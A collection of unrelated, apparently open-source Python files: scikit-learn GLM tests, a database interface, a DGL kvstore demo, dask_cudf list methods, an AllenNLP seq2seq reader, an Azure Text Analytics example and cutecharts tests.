@pytest.mark.parametrize("solver", ["not a solver", 1, [1]])
def test_glm_solver_argument(solver):
"""Test GLM for invalid solver argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(solver=solver)
with pytest.raises(ValueError):
glm.fit(X, y)
@pytest.mark.parametrize("max_iter", ["not a number", 0, -1, 5.5, [1]])
def test_glm_max_iter_argument(max_iter):
"""Test GLM for invalid max_iter argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(max_iter=max_iter)
with pytest.raises(ValueError, match="must be a positive integer"):
glm.fit(X, y)
@pytest.mark.parametrize("tol", ["not a number", 0, -1.0, [1e-3]])
def test_glm_tol_argument(tol):
"""Test GLM for invalid tol argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(tol=tol)
with pytest.raises(ValueError, match="stopping criteria must be positive"):
glm.fit(X, y)
@pytest.mark.parametrize("warm_start", ["not bool", 1, 0, [True]])
def test_glm_warm_start_argument(warm_start):
"""Test GLM for invalid warm_start argument."""
y = np.array([1, 2])
X = np.array([[1], [1]])
glm = GeneralizedLinearRegressor(warm_start=warm_start)
with pytest.raises(ValueError, match="warm_start must be bool"):
glm.fit(X, y)
@pytest.mark.parametrize("fit_intercept", [False, True])
def test_glm_identity_regression(fit_intercept):
"""Test GLM regression with identity link on a simple dataset."""
coef = [1.0, 2.0]
X = np.array([[1, 1, 1, 1, 1], [0, 1, 2, 3, 4]]).T
y = np.dot(X, coef)
glm = GeneralizedLinearRegressor(
alpha=0,
family="normal",
link="identity",
fit_intercept=fit_intercept,
tol=1e-12,
)
if fit_intercept:
glm.fit(X[:, 1:], y)
assert_allclose(glm.coef_, coef[1:], rtol=1e-10)
assert_allclose(glm.intercept_, coef[0], rtol=1e-10)
else:
glm.fit(X, y)
assert_allclose(glm.coef_, coef, rtol=1e-12)
@pytest.mark.parametrize("fit_intercept", [False, True])
@pytest.mark.parametrize("alpha", [0.0, 1.0])
@pytest.mark.parametrize("family", ["normal", "poisson", "gamma"])
def test_glm_sample_weight_consistentcy(fit_intercept, alpha, family):
"""Test that the impact of sample_weight is consistent"""
rng = np.random.RandomState(0)
n_samples, n_features = 10, 5
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
glm_params = dict(
alpha=alpha, family=family, link="auto", fit_intercept=fit_intercept
)
glm = GeneralizedLinearRegressor(**glm_params).fit(X, y)
coef = glm.coef_.copy()
# sample_weight=np.ones(..) should be equivalent to sample_weight=None
sample_weight = np.ones(y.shape)
glm.fit(X, y, sample_weight=sample_weight)
assert_allclose(glm.coef_, coef, rtol=1e-12)
# sample_weight are normalized to 1 so, scaling them has no effect
sample_weight = 2 * np.ones(y.shape)
glm.fit(X, y, sample_weight=sample_weight)
assert_allclose(glm.coef_, coef, rtol=1e-12)
# setting one element of sample_weight to 0 is equivalent to removing
# the correspoding sample
sample_weight = np.ones(y.shape)
sample_weight[-1] = 0
glm.fit(X, y, sample_weight=sample_weight)
coef1 = glm.coef_.copy()
glm.fit(X[:-1], y[:-1])
assert_allclose(glm.coef_, coef1, rtol=1e-12)
# check that multiplying sample_weight by 2 is equivalent
# to repeating correspoding samples twice
X2 = np.concatenate([X, X[: n_samples // 2]], axis=0)
y2 = np.concatenate([y, y[: n_samples // 2]])
sample_weight_1 = np.ones(len(y))
sample_weight_1[: n_samples // 2] = 2
glm1 = GeneralizedLinearRegressor(**glm_params).fit(
X, y, sample_weight=sample_weight_1
)
glm2 = GeneralizedLinearRegressor(**glm_params).fit(X2, y2, sample_weight=None)
assert_allclose(glm1.coef_, glm2.coef_)
@pytest.mark.parametrize("fit_intercept", [True, False])
@pytest.mark.parametrize(
"family",
[
NormalDistribution(),
PoissonDistribution(),
GammaDistribution(),
InverseGaussianDistribution(),
TweedieDistribution(power=1.5),
TweedieDistribution(power=4.5),
],
)
def test_glm_log_regression(fit_intercept, family):
"""Test GLM regression with log link on a simple dataset."""
coef = [0.2, -0.1]
X = np.array([[1, 1, 1, 1, 1], [0, 1, 2, 3, 4]]).T
y = np.exp(np.dot(X, coef))
glm = GeneralizedLinearRegressor(
alpha=0, family=family, link="log", fit_intercept=fit_intercept, tol=1e-7
)
if fit_intercept:
res = glm.fit(X[:, 1:], y)
assert_allclose(res.coef_, coef[1:], rtol=1e-6)
assert_allclose(res.intercept_, coef[0], rtol=1e-6)
else:
res = glm.fit(X, y)
assert_allclose(res.coef_, coef, rtol=2e-6)
@pytest.mark.parametrize("fit_intercept", [True, False])
def test_warm_start(fit_intercept):
n_samples, n_features = 110, 10
X, y = make_regression(
n_samples=n_samples,
n_features=n_features,
n_informative=n_features - 2,
noise=0.5,
random_state=42,
)
glm1 = GeneralizedLinearRegressor(
warm_start=False, fit_intercept=fit_intercept, max_iter=1000
)
glm1.fit(X, y)
glm2 = GeneralizedLinearRegressor(
warm_start=True, fit_intercept=fit_intercept, max_iter=1
)
# As we intentionally set max_iter=1, L-BFGS-B will issue a
# ConvergenceWarning which we here simply ignore.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=ConvergenceWarning)
glm2.fit(X, y)
assert glm1.score(X, y) > glm2.score(X, y)
glm2.set_params(max_iter=1000)
glm2.fit(X, y)
# The two model are not exactly identical since the lbfgs solver
# computes the approximate hessian from previous iterations, which
# will not be strictly identical in the case of a warm start.
assert_allclose(glm1.coef_, glm2.coef_, rtol=1e-5)
assert_allclose(glm1.score(X, y), glm2.score(X, y), rtol=1e-4)
# FIXME: 'normalize' to be removed in 1.2 in LinearRegression
@pytest.mark.filterwarnings("ignore:'normalize' was deprecated")
@pytest.mark.parametrize("n_samples, n_features", [(100, 10), (10, 100)])
@pytest.mark.parametrize("fit_intercept", [True, False])
@pytest.mark.parametrize("sample_weight", [None, True])
def test_normal_ridge_comparison(
n_samples, n_features, fit_intercept, sample_weight, request
):
"""Compare with Ridge regression for Normal distributions."""
test_size = 10
X, y = make_regression(
n_samples=n_samples + test_size,
n_features=n_features,
n_informative=n_features - 2,
noise=0.5,
random_state=42,
)
if n_samples > n_features:
ridge_params = {"solver": "svd"}
else:
ridge_params = {"solver": "saga", "max_iter": 1000000, "tol": 1e-7}
(
X_train,
X_test,
y_train,
y_test,
) = train_test_split(X, y, test_size=test_size, random_state=0)
alpha = 1.0
if sample_weight is None:
sw_train = None
alpha_ridge = alpha * n_samples
else:
sw_train = np.random.RandomState(0).rand(len(y_train))
alpha_ridge = alpha * sw_train.sum()
# GLM has 1/(2*n) * Loss + 1/2*L2, Ridge has Loss + L2
ridge = Ridge(
alpha=alpha_ridge,
normalize=False,
random_state=42,
fit_intercept=fit_intercept,
**ridge_params,
)
ridge.fit(X_train, y_train, sample_weight=sw_train)
glm = GeneralizedLinearRegressor(
alpha=alpha,
family="normal",
link="identity",
fit_intercept=fit_intercept,
max_iter=300,
tol=1e-5,
)
glm.fit(X_train, y_train, sample_weight=sw_train)
assert glm.coef_.shape == (X.shape[1],)
assert_allclose(glm.coef_, ridge.coef_, atol=5e-5)
assert_allclose(glm.intercept_, ridge.intercept_, rtol=1e-5)
assert_allclose(glm.predict(X_train), ridge.predict(X_train), rtol=2e-4)
assert_allclose(glm.predict(X_test), ridge.predict(X_test), rtol=2e-4)
def test_poisson_glmnet():
"""Compare Poisson regression with L2 regularization and LogLink to glmnet"""
# library("glmnet")
# options(digits=10)
# df <- data.frame(a=c(-2,-1,1,2), b=c(0,0,1,1), y=c(0,1,1,2))
# x <- data.matrix(df[,c("a", "b")])
# y <- df$y
# fit <- glmnet(x=x, y=y, alpha=0, intercept=T, family="poisson",
# standardize=F, thresh=1e-10, nlambda=10000)
# coef(fit, s=1)
# (Intercept) -0.12889386979
# a 0.29019207995
# b 0.03741173122
X = np.array([[-2, -1, 1, 2], [0, 0, 1, 1]]).T
y = np.array([0, 1, 1, 2])
glm = GeneralizedLinearRegressor(
alpha=1,
fit_intercept=True,
family="poisson",
link="log",
tol=1e-7,
max_iter=300,
)
glm.fit(X, y)
assert_allclose(glm.intercept_, -0.12889386979, rtol=1e-5)
assert_allclose(glm.coef_, [0.29019207995, 0.03741173122], rtol=1e-5)
def test_convergence_warning(regression_data):
X, y = regression_data
est = GeneralizedLinearRegressor(max_iter=1, tol=1e-20)
with pytest.warns(ConvergenceWarning):
est.fit(X, y)
def test_poisson_regression_family(regression_data):
# Make sure the family attribute is read-only to prevent searching over it
# e.g. in a grid search
est = PoissonRegressor()
est.family == "poisson"
msg = "PoissonRegressor.family must be 'poisson'!"
with pytest.raises(ValueError, match=msg):
est.family = 0
def test_gamma_regression_family(regression_data):
# Make sure the family attribute is read-only to prevent searching over it
# e.g. in a grid search
est = GammaRegressor()
est.family == "gamma"
msg = "GammaRegressor.family must be 'gamma'!"
with pytest.raises(ValueError, match=msg):
est.family = 0
def test_tweedie_regression_family(regression_data):
# Make sure the family attribute is always a TweedieDistribution and that
# the power attribute is properly updated
power = 2.0
est = TweedieRegressor(power=power)
assert isinstance(est.family, TweedieDistribution)
assert est.family.power == power
assert est.power == power
new_power = 0
new_family = TweedieDistribution(power=new_power)
est.family = new_family
assert isinstance(est.family, TweedieDistribution)
assert est.family.power == new_power
assert est.power == new_power
msg = "TweedieRegressor.family must be of type TweedieDistribution!"
with pytest.raises(TypeError, match=msg):
est.family = None
@pytest.mark.parametrize(
"estimator, value",
[
(PoissonRegressor(), True),
(GammaRegressor(), True),
(TweedieRegressor(power=1.5), True),
(TweedieRegressor(power=0), False),
],
)
def test_tags(estimator, value):
assert estimator._get_tags()["requires_positive_y"] is value
|
the-stack_106_22184
|
from abc import ABC, abstractmethod
from typing import Dict, List, Tuple
from enum import Enum
from nxs_types import DataModel
class NxsDbType(str, Enum):
MONGODB = "mongodb"
REDIS = "redis"
class NxsDbSortType(int, Enum):
DESCENDING = -1
ASCENDING = 1
class NxsDbQueryConfig(DataModel):
projection_list: List[str] = []
sort_list: List[Tuple[str, NxsDbSortType]] = []
skip: int = 0
limit: int = None
class NxsDbExceptionMissingShardKey(Exception):
pass
class NxsDbInvalidDbType(Exception):
pass
class NxsDb(ABC):
def __init__(self) -> None:
super().__init__()
@abstractmethod
def query(
self,
collection_name: str,
query: Dict,
query_config: NxsDbQueryConfig = NxsDbQueryConfig(),
extra_params: Dict = {},
) -> List:
raise NotImplementedError
@abstractmethod
def insert(self, collection_name: str, data: Dict, extra_params: Dict = {}) -> None:
raise NotImplementedError
@abstractmethod
def update(
self,
collection_name: str,
query: Dict,
new_data: Dict,
insert_if_not_existed: bool = False,
extra_params: Dict = {},
) -> None:
raise NotImplementedError
@abstractmethod
def delete(
self, collection_name: str, query: Dict, extra_params: Dict = {}
) -> None:
raise NotImplementedError
@abstractmethod
def close(self) -> None:
raise NotImplementedError
class NxsDbFactory:
@staticmethod
def create_db(type: NxsDbType, **kwargs) -> NxsDb:
if type == NxsDbType.MONGODB:
from nxs_libs.db.nxs_mongodb import NxsMongoDb
return NxsMongoDb(**kwargs)
elif type == NxsDbType.REDIS:
from nxs_libs.db.nxs_redis import NxsSimpleRedisDB
return NxsSimpleRedisDB(**kwargs)
raise NxsDbInvalidDbType
|
the-stack_106_22186
|
from ..scripts.test_script_ver_4 import *
from ..scripts.hist_eq import hist_eq
def driver_he():
# making preprocessing_name string
preprocessing_name = "HE"
# method as function name
method = hist_eq
# making initial list
parameters_list = ['', method, []]
parameters_string = 'histogram_eq'
parameters_list[0] = parameters_string
parameters_list[2] = []
analysis(preprocessing_name, parameters_list)
# def
if __name__ == "__main__":
driver_he()
|
the-stack_106_22187
|
# This is a simple MXNet server demo shows how to use DGL distributed kvstore.
import dgl
import argparse
import mxnet as mx
import time
ID = []
ID.append(mx.nd.array([0,1], dtype='int64'))
ID.append(mx.nd.array([2,3], dtype='int64'))
ID.append(mx.nd.array([4,5], dtype='int64'))
ID.append(mx.nd.array([6,7], dtype='int64'))
DATA = []
DATA.append(mx.nd.array([[1.,1.,1.,],[1.,1.,1.,]]))
DATA.append(mx.nd.array([[2.,2.,2.,],[2.,2.,2.,]]))
DATA.append(mx.nd.array([[3.,3.,3.,],[3.,3.,3.,]]))
DATA.append(mx.nd.array([[4.,4.,4.,],[4.,4.,4.,]]))
edata_partition_book = {'edata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_partition_book = {'ndata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
def start_client():
time.sleep(3)
client = dgl.contrib.start_client(ip_config='ip_config.txt',
ndata_partition_book=ndata_partition_book,
edata_partition_book=edata_partition_book,
close_shared_mem=True)
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
print(tensor_edata)
client.barrier()
print(tensor_ndata)
client.barrier()
client.push(name='edata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.push(name='ndata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.barrier()
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
print(tensor_edata)
client.barrier()
print(tensor_ndata)
client.barrier()
if client.get_id() == 0:
client.shut_down()
if __name__ == '__main__':
start_client()
|
the-stack_106_22188
|
# Copyright (c) 2021, NVIDIA CORPORATION.
class ListMethods:
def __init__(self, d_series):
self.d_series = d_series
def len(self):
"""
Computes the length of each element in the Series/Index.
Returns
-------
Series or Index
Examples
--------
>>> s = cudf.Series([[1, 2, 3], None, [4, 5]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1, 2, 3]
1 None
2 [4, 5]
dtype: list
>>> ds.list.len().compute()
0 3
1 <NA>
2 2
dtype: int32
"""
return self.d_series.map_partitions(
lambda s: s.list.len(), meta=self.d_series._meta
)
def contains(self, search_key):
"""
Creates a column of bool values indicating whether the specified scalar
is an element of each row of a list column.
Parameters
----------
search_key : scalar
element being searched for in each row of the list column
Returns
-------
Column
Examples
--------
>>> s = cudf.Series([[1, 2, 3], [3, 4, 5], [4, 5, 6]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.contains(4).compute()
Series([False, True, True])
dtype: bool
"""
return self.d_series.map_partitions(
lambda s: s.list.contains(search_key), meta=self.d_series._meta
)
def get(self, index):
"""
Extract element at the given index from each component
Extract element from lists, tuples, or strings in
each element in the Series/Index.
Parameters
----------
index : int
Returns
-------
Series or Index
Examples
--------
>>> s = cudf.Series([[1, 2, 3], [3, 4, 5], [4, 5, 6]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.get(-1).compute()
0 3
1 5
2 6
dtype: int64
"""
return self.d_series.map_partitions(
lambda s: s.list.get(index), meta=self.d_series._meta
)
@property
def leaves(self):
"""
From a Series of (possibly nested) lists, obtain the elements from
the innermost lists as a flat Series (one value per row).
Returns
-------
Series
Examples
--------
>>> s = cudf.Series([[[1, None], [3, 4]], None, [[5, 6]]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.leaves.compute()
0 1
1 <NA>
2 3
3 4
4 5
5 6
dtype: int64
"""
return self.d_series.map_partitions(
lambda s: s.list.leaves, meta=self.d_series._meta
)
def take(self, lists_indices):
"""
Collect list elements based on given indices.
Parameters
----------
lists_indices: List type arrays
Specifies what to collect from each row
Returns
-------
ListColumn
Examples
--------
>>> s = cudf.Series([[1, 2, 3], None, [4, 5]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1, 2, 3]
1 None
2 [4, 5]
dtype: list
>>> ds.list.take([[0, 1], [], []]).compute()
0 [1, 2]
1 None
2 []
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.take(lists_indices), meta=self.d_series._meta
)
def unique(self):
"""
Returns unique element for each list in the column, order for each
unique element is not guaranteed.
Returns
-------
ListColumn
Examples
--------
>>> s = cudf.Series([[1, 1, 2, None, None], None, [4, 4], []])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1.0, 1.0, 2.0, nan, nan]
1 None
2 [4.0, 4.0]
3 []
dtype: list
>>> ds.list.unique().compute() # Order of elements not guaranteed
0 [1.0, 2.0, nan]
1 None
2 [4.0]
3 []
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.unique(), meta=self.d_series._meta
)
def sort_values(
self,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
ignore_index=False,
):
"""
Sort each list by the values.
Sort the lists in ascending or descending order by some criterion.
Parameters
----------
ascending : bool, default True
If True, sort values in ascending order, otherwise descending.
na_position : {'first', 'last'}, default 'last'
'first' puts nulls at the beginning, 'last' puts nulls at the end.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, ..., n - 1.
Returns
-------
ListColumn with each list sorted
Notes
-----
Difference from pandas:
* Not supporting: `inplace`, `kind`
Examples
--------
>>> s = cudf.Series([[4, 2, None, 9], [8, 8, 2], [2, 1]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.sort_values(ascending=True, na_position="last").compute()
0 [2.0, 4.0, 9.0, nan]
1 [2.0, 8.0, 8.0]
2 [1.0, 2.0]
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.sort_values(
ascending, inplace, kind, na_position, ignore_index
),
meta=self.d_series._meta,
)
|
the-stack_106_22189
|
import csv
from typing import Dict, List, Optional
import logging
import copy
from random import randint, sample
from overrides import overrides
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.util import START_SYMBOL, END_SYMBOL
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data import Token
from allennlp.data.fields import TextField, TensorField
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import PretrainedTransformerTokenizer
from allennlp.data.token_indexers import TokenIndexer, PretrainedTransformerIndexer, SingleIdTokenIndexer
from zxp.dataset_readers.seq2seq_pretrain_paired \
import MBARTTokenizerWrapper, LANG2IDX, DEFAULT_LANGIDX, VALID_MBART50_MODELS, VALID_MBART_MODELS, LanguageFormatter
logger = logging.getLogger(__name__)
MASK_SYMBOL = "<mask>"
@DatasetReader.register("seq2seq_pretrain_unpaired")
class PretrainedTransformerSeq2SeqUnpairedDatasetReader(DatasetReader):
"""
Unifies the seq2seq dataset parsers for standard Huggingface embedders (BART, XLM-Roberta, etc)
with the embedder for mBART-50 which requires a different interface due to locale switching.
Assume NL-LOCALE pairs. The target_string is a copy of source that is independently indexed for the NL-decoder.
Compose Instances of "source_tokens", "source_lang" and optionally "target_tokens".
- "source_tokens" should be NL
- "source_lang" should be an ISO code (or converted to one)
- "target_tokens" will be NL.
Expected format for each input line: <source_sequence_string>\t<source_lang>
If we lack <source_lang> then we assume this is "en_XX".
The output of `read` is a list of `Instance` s with the fields:
source_tokens : `TextField` and
target_tokens : `Optional[TextField]` and
source_lang : `TextField`
"""
def __init__(
self,
source_pretrained_model_name: str = None,
source_token_namespace: str = "tokens",
use_mbart_indexer: bool = True,
target_token_indexers: Dict[str, TokenIndexer] = None,
delimiter: str = "\t",
source_max_tokens: Optional[int] = 1024,
quoting: int = csv.QUOTE_MINIMAL,
num_tokens_to_mask: int = 0,
**kwargs,
) -> None:
super().__init__(**kwargs)
self._mbart50_tokenizer = False
self._mbart_tokenizer = False
if source_pretrained_model_name in VALID_MBART50_MODELS:
logger.info(f"Creating mBART-50 based tokenizer for {source_pretrained_model_name}")
self._source_tokenizer = MBARTTokenizerWrapper(source_pretrained_model_name, source_max_tokens)
self._mbart50_tokenizer = True
else:
logger.info(f"Creating generic HuggingFace tokenizer for {source_pretrained_model_name}")
# Tokenization works best if we use the ANLP implementation. For mbart-large-cc25 we need
# to manually switch the source lang before each tokenizer call.
if source_pretrained_model_name in VALID_MBART_MODELS:
self._mbart_tokenizer = True
self._source_tokenizer = PretrainedTransformerTokenizer(
model_name=source_pretrained_model_name, add_special_tokens=True)
if use_mbart_indexer:
self._source_token_indexers = {
source_token_namespace: PretrainedTransformerIndexer(model_name=source_pretrained_model_name,
namespace=source_token_namespace
)
}
else:
self._source_token_indexers = {
source_token_namespace: SingleIdTokenIndexer(namespace=source_token_namespace)
}
# Language code validator
self._validator = LanguageFormatter(self._source_tokenizer.tokenizer.additional_special_tokens)
# There is a conflict here because we want to follow the source tokenization but DecoderNet instances
# rigidly expect the START_SYMBOL, END_SYMBOL bookends. We try the HF approach with `add_special_tokens=False`
if source_pretrained_model_name in VALID_MBART50_MODELS:
logger.info(f"Creating mBART-50 based tokenizer for {source_pretrained_model_name}")
self._target_tokenizer = MBARTTokenizerWrapper(source_pretrained_model_name, source_max_tokens)
else:
logger.info(f"Creating generic HuggingFace tokenizer for {source_pretrained_model_name}")
self._target_tokenizer = PretrainedTransformerTokenizer(
model_name=source_pretrained_model_name, add_special_tokens=False)
logger.info(f"Expectation of sentence locale pairs without target sequence. tgt_tokenizer follows source.")
# Target indexing should probably not match source as we aren't copying the embedder.
self._target_token_indexers = target_token_indexers
# DecoderNet instances expect these specific symbols.
self._start_token = Token(START_SYMBOL)
self._end_token = Token(END_SYMBOL)
# Locate mask token
self._num_tokens_to_mask = num_tokens_to_mask
mask_seq = self._source_tokenizer.tokenize(MASK_SYMBOL)
mask_seq_ = [t for t in mask_seq if t.text == MASK_SYMBOL]
if mask_seq_:
self._mask_token = mask_seq_[0]
else:
raise ValueError(f"Cannot locate mask token inside source tokenizer. Search over {mask_seq}.")
# Start and end token logic
self._target_add_start_token = True
self._target_add_end_token = True
logger.info(f"Target tokenizer BOS: \"{self._start_token}\" and EOS: \"{self._end_token}\"")
# TSV delimiter
self._delimiter = delimiter
self._source_max_tokens = source_max_tokens
self._target_max_tokens = source_max_tokens
self._source_max_exceeded = 0
self._target_max_exceeded = 0
self.quoting = quoting
@overrides
def _read(self, file_path: str):
# Reset exceeded counts
self._source_max_exceeded = 0
self._target_max_exceeded = 0
# Open data file
with open(cached_path(file_path), "r") as data_file:
logger.info("Reading instances from lines in file at: %s", file_path)
# Enumerate rows in data file
for line_num, row in enumerate(
csv.reader(data_file, delimiter=self._delimiter, quoting=self.quoting)
):
# First case is the NL\tLOCALE case
if len(row) == 2:
source_sequence, source_lang = row
target_sequence = source_sequence
else:
raise ConfigurationError(
"Invalid line format: %s (line number %d)" % (row, line_num + 1)
)
yield self.text_to_instance(source_sequence, target_sequence, source_lang)
if self._source_max_tokens and self._source_max_exceeded:
logger.info(
"In %d instances, the source token length exceeded the max limit (%d) and were truncated.",
self._source_max_exceeded,
self._source_max_tokens,
)
if self._target_max_tokens and self._target_max_exceeded:
logger.info(
"In %d instances, the target token length exceeded the max limit (%d) and were truncated.",
self._target_max_exceeded,
self._target_max_tokens,
)
@overrides
def text_to_instance(
self, source_string: str, target_string: str = None, source_lang: str = None
) -> Instance: # type: ignore
source_lang = self._validator(source_lang)
tokenizer_args = (source_string, source_lang) if self._mbart50_tokenizer else (source_string, )
if self._mbart_tokenizer:
self._source_tokenizer.tokenizer.src_lang = source_lang
tokenized_source = self._source_tokenizer.tokenize(*tokenizer_args)
if self._source_max_tokens and len(tokenized_source) > self._source_max_tokens:
self._source_max_exceeded += 1
tokenized_source = tokenized_source[: self._source_max_tokens]
# Replace between `0` and `num_symbols_to_mask` symbols with the <mask> token
if self._num_tokens_to_mask:
# We check that we aren't masking the full sequence. If we are trying to mask more tokens
# than available then we set a maximum of half the sequence
max_num_tokens_to_mask = self._num_tokens_to_mask if \
len(tokenized_source) > self._num_tokens_to_mask else int(len(tokenized_source) / 2)
num_mask = randint(0, max_num_tokens_to_mask) # Replace between 0 and _num_token_to_mask tokens
idx_to_mask = sample(range(len(tokenized_source)), num_mask)
for idx in idx_to_mask:
tokenized_source[idx] = self._mask_token
source_field = TextField(tokenized_source, self._source_token_indexers)
source_lang_iso = self._validator(source_lang)
lang_field = TensorField(LANG2IDX.get(source_lang_iso, DEFAULT_LANGIDX))
# Passing in target_string as a copy of the source is not redundant as we need different BOS/EOS behaviour
if target_string is not None:
tokenizer_args = (target_string, source_lang, False) if self._mbart50_tokenizer else (target_string,)
tokenized_target = self._target_tokenizer.tokenize(*tokenizer_args)
if self._target_max_tokens and len(tokenized_target) > self._target_max_tokens:
self._target_max_exceeded += 1
tokenized_target = tokenized_target[: self._target_max_tokens]
if self._target_add_start_token:
tokenized_target.insert(0, copy.deepcopy(self._start_token))
if self._target_add_end_token:
tokenized_target.append(copy.deepcopy(self._end_token))
target_field = TextField(tokenized_target, self._target_token_indexers)
return Instance({"source_tokens": source_field, "target_tokens": target_field, "source_lang": lang_field})
else:
return Instance({"source_tokens": source_field, "source_lang": lang_field})
|
the-stack_106_22190
|
# Author: Parashar Shah
# Chapter: Cognitive Services
# Version: 1.0
# Date: May 25, 2018
# Replace <Subscription Key> with your valid subscription's api access key.
subscription_key = "<Access Key>"
assert subscription_key
# Replace the base url with what you see as Endpoint in the portal’s Overview section under your api
text_analytics_base_url = "https://westus2.api.cognitive.microsoft.com/text/analytics/v2.0/"
sentiment_api_url = text_analytics_base_url + "sentiment"
# Send the text you want the api to analyze
# You can send multiple texts
documents = {'documents' : [
{'id': '1', 'text': 'I am excited about using AI offerings by Microsoft.'},
]}
import requests
# Get sentiment of text
headers = {"Ocp-Apim-Subscription-Key": subscription_key}
response = requests.post(sentiment_api_url, headers=headers, json=documents)
sentiments = response.json()
print(sentiments)
# Get the language of text
language_api_url = text_analytics_base_url + "languages"
response = requests.post(language_api_url, headers=headers, json=documents)
languages = response.json()
print(languages)
# Get key phrases from text
key_phrase_api_url = text_analytics_base_url + "keyPhrases"
response = requests.post(key_phrase_api_url, headers=headers, json=documents)
key_phrases = response.json()
print(key_phrases)
# Get well-known entities
entity_linking_api_url = text_analytics_base_url + "entities"
response = requests.post(entity_linking_api_url, headers=headers, json=documents)
entities = response.json()
print(entities)
|
the-stack_106_22191
|
from nose.tools import assert_equal
from cutecharts.charts import Pie
from cutecharts.render.engine import remove_key_with_none_value
def gen_pie_base() -> Pie:
c = Pie("Pie")
c.set_options(labels=["A", "B"])
c.add_series(["1", "2"])
return c
def test_pie_opts_before():
c = gen_pie_base()
expected = {
"title": "Pie",
"data": {"datasets": [{"data": ["1", "2"]}], "labels": ["A", "B"]},
"options": {
"dataColors": None,
"fontFamily": None,
"innerRadius": 0.5,
"legendPosition": 1,
},
}
assert_equal(c.opts, expected)
def test_pie_opts_after():
c = gen_pie_base()
c.opts = remove_key_with_none_value(c.opts)
expected = {
"title": "Pie",
"data": {"datasets": [{"data": ["1", "2"]}], "labels": ["A", "B"]},
"options": {"innerRadius": 0.5, "legendPosition": 1},
}
assert_equal(c.opts, expected)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.